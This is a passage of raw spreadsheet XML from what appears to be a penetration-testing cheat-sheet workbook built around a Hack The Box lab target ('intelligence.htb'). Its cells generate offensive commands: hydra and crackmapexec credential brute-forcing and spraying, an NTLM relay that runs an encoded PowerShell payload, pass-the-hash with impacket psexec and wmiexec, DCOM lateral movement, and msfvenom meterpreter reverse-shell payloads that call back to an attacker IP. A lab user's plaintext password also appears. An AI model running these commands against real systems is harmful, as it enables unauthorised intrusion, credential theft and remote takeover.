      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="12" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="3" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="12" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="3" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="3" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="4" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="3" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="3" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="33" spans="2:14">
      <c r="B33" s="3" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="34" spans="2:14">
      <c r="B34" s="3" t="s">
        <v>341</v>
      </c>
    </row>
    <row r="35" spans="2:14">
      <c r="B35" s="3" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="36" spans="2:14">
      <c r="B36" s="3" t="s">
        <v>343</v>
      </c>
    </row>
    <row r="38" spans="2:14">
      <c r="B38" s="4" t="s">
        <v>344</v>
      </c>
      <c r="E38" s="4"/>
      <c r="F38" s="4"/>
    </row>
    <row r="39" spans="2:14">
      <c r="B39" s="3" t="s">
        <v>345</v>
      </c>
      <c r="E39" s="4"/>
      <c r="F39" s="4"/>
    </row>
    <row r="40" spans="2:14">
      <c r="B40" s="3" t="s">
        <v>346</v>
      </c>
      <c r="E40" s="4"/>
      <c r="F40" s="4"/>
      <c r="N40" s="3" t="s">
        <v>347</v>
      </c>
    </row>
    <row r="41" spans="2:14">
      <c r="B41" s="3" t="s">
        <v>348</v>
      </c>
      <c r="N41" s="3" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="42" spans="2:14">
      <c r="B42" s="3" t="s">
        <v>350</v>
      </c>
      <c r="N42" s="3" t="s">
        <v>351</v>
      </c>
    </row>
    <row r="43" spans="2:14">
      <c r="B43" s="3" t="s">
        <v>352</v>
      </c>
      <c r="N43" s="3" t="s">
        <v>353</v>
      </c>
    </row>
    <row r="44" spans="2:14">
      <c r="B44" s="3" t="s">
        <v>354</v>
      </c>
      <c r="N44" s="3" t="s">
        <v>355</v>
      </c>
    </row>
    <row r="45" spans="2:14">
      <c r="B45" s="3" t="s">
        <v>356</v>
      </c>
      <c r="N45" s="3" t="s">
        <v>357</v>
      </c>
    </row>
    <row r="46" spans="2:14">
      <c r="B46" s="3" t="s">
        <v>358</v>
      </c>
      <c r="N46" s="3" t="s">
        <v>359</v>
      </c>
    </row>
    <row r="47" spans="2:14">
      <c r="B47" s="3" t="s">
        <v>360</v>
      </c>
      <c r="N47" s="3" t="s">
        <v>361</v>
      </c>
    </row>
    <row r="48" spans="2:14">
      <c r="B48" s="3" t="s">
        <v>362</v>
      </c>
      <c r="N48" s="3" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="49" spans="2:14">
      <c r="B49" s="3" t="s">
        <v>364</v>
      </c>
      <c r="N49" s="3" t="s">
        <v>365</v>
      </c>
    </row>
    <row r="50" spans="2:14">
      <c r="B50" s="3" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="51" spans="2:14">
      <c r="B51" s="3" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="52" spans="2:14">
      <c r="B52" s="3" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="53" spans="2:14">
      <c r="B53" s="3" t="s">
        <v>369</v>
      </c>
    </row>
    <row r="54" spans="2:14">
      <c r="B54" s="3" t="s">
        <v>370</v>
      </c>
    </row>
    <row r="55" spans="2:14">
      <c r="B55" s="3" t="s">
        <v>371</v>
      </c>
    </row>
    <row r="56" spans="2:14">
      <c r="B56" s="3" t="s">
        <v>372</v>
      </c>
    </row>
    <row r="58" spans="2:14">
      <c r="B58" s="4" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="59" spans="2:14">
      <c r="B59" s="3" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="60" spans="2:14">
      <c r="B60" s="3" t="s">
        <v>375</v>
      </c>
      <c r="E60" s="3" t="s">
        <v>376</v>
      </c>
    </row>
    <row r="61" spans="2:14">
      <c r="B61" s="3" t="s">
        <v>377</v>
      </c>
    </row>
    <row r="62" spans="2:14">
      <c r="B62" s="3" t="str">
        <f>"dir \\"&amp;$C$4&amp;"\test"</f>
        <v>dir \\10.10.16.4\test</v>
      </c>
    </row>
    <row r="63" spans="2:14">
      <c r="B63" s="3" t="str">
        <f>"//"&amp;$C$4&amp;"/test"</f>
        <v>//10.10.16.4/test</v>
      </c>
    </row>
    <row r="65" spans="2:8">
      <c r="B65" s="4" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="66" spans="2:8">
      <c r="B66" s="3" t="s">
        <v>379</v>
      </c>
    </row>
    <row r="67" spans="2:8">
      <c r="B67" s="3" t="str">
        <f>"hydra -L users.txt -P passwords.txt "&amp;$C$5&amp;" ftp -v -t 64"</f>
        <v>hydra -L users.txt -P passwords.txt 10.10.10.248 ftp -v -t 64</v>
      </c>
    </row>
    <row r="68" spans="2:8">
      <c r="B68" s="3" t="str">
        <f>"hydra -L users.txt -P passwords.txt "&amp;C5&amp;" ssh -v -t 64"</f>
        <v>hydra -L users.txt -P passwords.txt 10.10.10.248 ssh -v -t 64</v>
      </c>
    </row>
    <row r="69" spans="2:8">
      <c r="B69" s="3" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="70" spans="2:8">
      <c r="B70" s="3" t="s">
        <v>381</v>
      </c>
    </row>
    <row r="71" spans="2:8">
      <c r="B71" s="3" t="s">
        <v>382</v>
      </c>
    </row>
    <row r="73" spans="2:8">
      <c r="B73" s="3" t="s">
        <v>383</v>
      </c>
      <c r="H73" s="3" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="74" spans="2:8">
      <c r="B74" s="8" t="s">
        <v>385</v>
      </c>
    </row>
    <row r="75" spans="2:8">
      <c r="B75" s="8"/>
    </row>
    <row r="76" spans="2:8">
      <c r="B76" s="4" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="77" spans="2:8">
      <c r="B77" s="16" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="78" spans="2:8">
      <c r="B78" s="3" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="79" spans="2:8">
      <c r="B79" s="3" t="s">
        <v>388</v>
      </c>
    </row>
    <row r="80" spans="2:8">
      <c r="B80" s="3" t="s">
        <v>389</v>
      </c>
      <c r="H80" s="3" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="81" spans="2:8">
      <c r="B81" s="16" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="82" spans="2:8">
      <c r="B82" s="3" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="83" spans="2:8">
      <c r="B83" s="3" t="s">
        <v>392</v>
      </c>
    </row>
    <row r="84" spans="2:8">
      <c r="B84" s="3" t="s">
        <v>393</v>
      </c>
    </row>
    <row r="85" spans="2:8">
      <c r="B85" s="3" t="s">
        <v>394</v>
      </c>
      <c r="H85" s="3" t="s">
        <v>395</v>
      </c>
    </row>
    <row r="86" spans="2:8">
      <c r="B86" s="4"/>
    </row>
    <row r="87" spans="2:8" s="16" customFormat="1">
      <c r="B87" s="4"/>
    </row>
    <row r="88" spans="2:8">
      <c r="B88" s="8"/>
    </row>
    <row r="89" spans="2:8">
      <c r="B89" s="4" t="s">
        <v>396</v>
      </c>
    </row>
    <row r="90" spans="2:8">
      <c r="B90" s="3" t="s">
        <v>397</v>
      </c>
    </row>
    <row r="91" spans="2:8">
      <c r="B91" s="3" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="93" spans="2:8">
      <c r="B93" s="4" t="s">
        <v>399</v>
      </c>
    </row>
    <row r="94" spans="2:8">
      <c r="B94" s="3" t="s">
        <v>400</v>
      </c>
    </row>
    <row r="95" spans="2:8">
      <c r="B95" s="3" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="4" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="99" spans="2:2">
      <c r="B99" s="3" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="3" t="s">
        <v>404</v>
      </c>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="4" t="s">
        <v>405</v>
      </c>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="3" t="s">
        <v>406</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="B74" r:id="rId1" xr:uid="{F2748ABA-5FE9-43F4-8F7B-6B1BD2F5BF8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ABA5-9505-47C2-8310-BD1E4BA99BE9}">
  <dimension ref="B2:I68"/>
  <sheetViews>
    <sheetView topLeftCell="A38" workbookViewId="0">
      <selection activeCell="D38" sqref="D38"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:9">
      <c r="B2" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="3" t="s">
        <v>408</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="11" spans="2:9">
      <c r="B11" s="4" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="3" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="3" t="str">
        <f>"sudo impacket-ntlmrelayx --no-http-server -smb2support -t "&amp;$C$5&amp;" -c 'powershell -enc JABjAGwAaQBlAG4AdA...'"</f>
        <v>sudo impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.248 -c 'powershell -enc JABjAGwAaQBlAG4AdA...'</v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="4" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="3" t="s">
        <v>411</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="3" t="s">
        <v>412</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="3" t="s">
        <v>413</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="s">
        <v>415</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="3" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="3" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="3" t="s">
        <v>417</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="3" t="s">
        <v>418</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="3" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="3" t="s">
        <v>420</v>
      </c>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="3" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="3" t="s">
        <v>422</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="3" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="3" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="3" t="s">
        <v>425</v>
      </c>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="3" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="3" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="3" t="s">
        <v>428</v>
      </c>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="4" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="31" t="str">
        <f>"bloodhound-python -d "&amp;$F$5&amp;" -u"&amp;$F$4&amp;" -p "&amp;$I$4&amp;" -gc "&amp;$F$5&amp;" -c all -ns "&amp;$C$5</f>
        <v>bloodhound-python -d intelligence.htb -uTiffany.Molina -p 'NewIntelligenceCorpUser9876' -gc intelligence.htb -c all -ns 10.10.10.248</v>
      </c>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="3" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="3" t="s">
        <v>431</v>
      </c>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="3" t="s">
        <v>432</v>
      </c>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="3" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="3" t="s">
        <v>434</v>
      </c>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="3" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="3" t="s">
        <v>436</v>
      </c>
    </row>
    <row r="47" spans="2:2">
      <c r="B47" s="3" t="s">
        <v>437</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="3" t="s">
        <v>439</v>
      </c>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="4" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="3" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="3" t="s">
        <v>443</v>
      </c>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="3" t="s">
        <v>444</v>
      </c>
    </row>
    <row r="58" spans="2:2">
      <c r="B58" s="4" t="s">
        <v>445</v>
      </c>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="3" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="4" t="s">
        <v>447</v>
      </c>
    </row>
    <row r="62" spans="2:2">
      <c r="B62" s="3" t="s">
        <v>448</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="3" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="65" spans="2:2">
      <c r="B65" s="4" t="s">
        <v>450</v>
      </c>
    </row>
    <row r="66" spans="2:2">
      <c r="B66" s="3" t="s">
        <v>451</v>
      </c>
    </row>
    <row r="67" spans="2:2">
      <c r="B67" s="3" t="s">
        <v>452</v>
      </c>
    </row>
    <row r="68" spans="2:2">
      <c r="B6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0AF-8CD1-4F00-B23B-59756E1F8E8F}">
  <dimension ref="A2:I54"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A29" workbookViewId="0">
      <selection activeCell="A54" sqref="A54:XFD56"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:9">
      <c r="B2" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="1:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="1:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="6" spans="1:9">
      <c r="B6" s="10"/>
    </row>
    <row r="7" spans="1:9">
      <c r="A7" s="4"/>
      <c r="B7" s="4" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="8" spans="1:9">
      <c r="A8" s="4"/>
      <c r="B8" s="3" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="9" spans="1:9">
      <c r="B9" s="3" t="str">
        <f>"crackmapexec smb "&amp;$C$5&amp;" -u users.txt -p passwords.txt --continue-on-success"</f>
        <v>crackmapexec smb 10.10.10.248 -u users.txt -p passwords.txt --continue-on-success</v>
      </c>
    </row>
    <row r="10" spans="1:9">
      <c r="A10" s="4"/>
      <c r="B10" s="3" t="str">
        <f>"crackmapexec smb "&amp;$C$5&amp;" -u "&amp;$F$4&amp;" -p "&amp;$I$4&amp;" --shares"</f>
        <v>crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' --shares</v>
      </c>
    </row>
    <row r="11" spans="1:9">
      <c r="B11" s="3" t="str">
        <f>"crackmapexec winrm "&amp;$C$5&amp;" -u users.txt -p passwords.txt --continue-on-success"</f>
        <v>crackmapexec winrm 10.10.10.248 -u users.txt -p passwords.txt --continue-on-success</v>
      </c>
    </row>
    <row r="13" spans="1:9">
      <c r="B13" s="4" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="14" spans="1:9">
      <c r="B14" s="3" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="15" spans="1:9">
      <c r="B15" s="3" t="s">
        <v>457</v>
      </c>
    </row>
    <row r="16" spans="1:9">
      <c r="B16" s="3" t="str">
        <f>"impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@"&amp;$C$4</f>
        <v>impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@10.10.16.4</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="3" t="str">
        <f>"impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@"&amp;$C$4</f>
        <v>impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@10.10.16.4</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="3" t="str">
        <f>"evil-winrm -i "&amp;$C$5&amp;" -u user -p password"</f>
        <v>evil-winrm -i 10.10.10.248 -u user -p password</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="3" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="4" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="3" t="s">
        <v>408</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="3" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="4" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="3" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="3" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="3" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="4" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="3" t="s">
        <v>343</v>
      </c>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="3" t="s">
        <v>464</v>
      </c>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="3" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="3" t="s">
        <v>465</v>
      </c>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="4" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="5" t="str">
        <f>"$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"","""&amp;C4&amp;"""))"</f>
        <v>$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.10.16.4"))</v>
      </c>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="5" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="5" t="s">
        <v>468</v>
      </c>
    </row>
    <row r="44" spans="2:2">
      <c r="B44" s="4" t="s">
        <v>469</v>
      </c>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="4" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="s">
        <v>472</v>
      </c>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="4" t="s">
        <v>473</v>
      </c>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="3" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="3" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="3" t="s">
        <v>476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C5D-AD15-4B4B-8844-292B84DB1237}">
  <dimension ref="B2:D51"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D28" sqref="D28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="2" width="9" style="3"/>
    <col min="3" max="3" width="101.875" style="3" customWidth="1"/>
    <col min="4" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>477</v>
      </c>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="3" t="s">
        <v>478</v>
      </c>
    </row>
    <row r="4" spans="2:2">
      <c r="B4" s="3" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="5" spans="2:2">
      <c r="B5" s="3" t="s">
        <v>480</v>
      </c>
    </row>
    <row r="6" spans="2:2">
      <c r="B6" s="3" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="7" spans="2:2">
      <c r="B7" s="3" t="s">
        <v>482</v>
      </c>
    </row>
    <row r="8" spans="2:2">
      <c r="B8" s="3" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="9" spans="2:2">
      <c r="B9" s="3" t="s">
        <v>484</v>
      </c>
    </row>
    <row r="10" spans="2:2">
      <c r="B10" s="3" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="12" spans="2:2">
      <c r="B12" s="4" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="13" spans="2:2">
      <c r="B13" s="3" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="14" spans="2:2">
      <c r="B14" s="3" t="s">
        <v>488</v>
      </c>
    </row>
    <row r="15" spans="2:2">
      <c r="B15" s="3" t="s">
        <v>489</v>
      </c>
    </row>
    <row r="16" spans="2:2">
      <c r="B16" s="3" t="s">
        <v>490</v>
      </c>
    </row>
    <row r="17" spans="2:4">
      <c r="B17" s="3" t="s">
        <v>491</v>
      </c>
    </row>
    <row r="18" spans="2:4">
      <c r="B18" s="3" t="s">
        <v>492</v>
      </c>
    </row>
    <row r="20" spans="2:4">
      <c r="B20" s="4" t="s">
        <v>493</v>
      </c>
    </row>
    <row r="21" spans="2:4">
      <c r="B21" s="3" t="s">
        <v>494</v>
      </c>
    </row>
    <row r="22" spans="2:4">
      <c r="B22" s="4"/>
    </row>
    <row r="23" spans="2:4">
      <c r="B23" s="4"/>
    </row>
    <row r="24" spans="2:4">
      <c r="B24" s="4"/>
    </row>
    <row r="27" spans="2:4">
      <c r="B27" s="4" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="28" spans="2:4">
      <c r="B28" s="3" t="s">
        <v>496</v>
      </c>
      <c r="C28" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f exe -o met.exe"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f exe -o met.exe</v>
      </c>
      <c r="D28" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="29" spans="2:4">
      <c r="B29" s="3" t="s">
        <v>498</v>
      </c>
      <c r="C29" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f aspx -o met.aspx"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f aspx -o met.aspx</v>
      </c>
      <c r="D29" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="30" spans="2:4">
      <c r="B30" s="3" t="s">
        <v>499</v>
      </c>
      <c r="C30" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f dll -o met.dll"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f dll -o met.dll</v>
      </c>
      <c r="D30" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="31" spans="2:4">
      <c r="B31" s="3" t="s">
        <v>500</v>
      </c>
      <c r="C31" s="3" t="str">
        <f>"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST="&amp;C4&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f elf &gt; met.elf"</f>
        <v>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f elf &gt; met.elf</v>
      </c>
      <c r="D31" s="3" t="s">
        <v>501</v>
      </c>
    </row>
    <row r="33" spans="2:4">
      <c r="B33" s="4" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="34" spans="2:4">
      <c r="B34" s="3" t="s">
        <v>496</v>
      </c>
      <c r="C34" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f exe -o met.exe"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f exe -o met.exe</v>
      </c>
      <c r="D34" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="35" spans="2:4">
      <c r="B35" s="3" t="s">
        <v>498</v>
      </c>
      <c r="C35" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f aspx -o met.aspx"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f aspx -o met.aspx</v>
      </c>
      <c r="D35" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="36" spans="2:4">
      <c r="B36" s="3" t="s">
        <v>499</v>
      </c>
      <c r="C36" s="3" t="str">
        <f>"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f dll -o met.dll"</f>
        <v>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f dll -o met.dll</v>
      </c>
      <c r="D36" s="3" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="37" spans="2:4">
